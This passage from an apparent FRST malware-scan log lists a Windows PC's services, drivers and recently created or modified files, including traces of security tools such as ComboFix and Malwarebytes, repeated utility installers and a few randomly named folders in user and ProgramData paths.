R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
R3 catchme; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 10:53 - 2014-08-25 11:10 - 00000000 ____D () C:\ComboFix
2014-08-23 16:54 - 2014-08-25 13:41 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-25 10:47 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-25 11:10 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-25 10:49 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 10:49 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 13:41 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-25 13:40 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log
2014-08-25 13:39 - 2014-07-18 00:39 - 01282029 _____ () C:\Windows\WindowsUpdate.log
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 11:10 - 2014-08-25 10:53 - 00000000 ____D () C:\ComboFix
2014-08-25 11:10 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-25 11:08 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-25 10:50 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-25 10:49 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-25 10:49 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 10:48 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-25 10:47 - 2014-08-22 16:12 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-25 10:47 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-25 10:46 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
